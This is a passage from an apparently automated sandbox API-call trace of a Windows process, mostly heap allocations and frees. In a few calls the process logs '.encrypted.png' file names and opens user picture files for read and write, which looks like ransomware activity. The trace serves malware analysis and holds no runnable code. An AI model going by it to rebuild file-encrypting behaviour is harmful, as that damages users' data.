lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 70 [0039.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0039.622] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0039.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.623] CloseHandle (hObject=0x140) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.624] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.624] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.626] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.626] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.626] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.626] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.626] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.629] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899a0 [0039.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.632] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\4g9fyjo.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 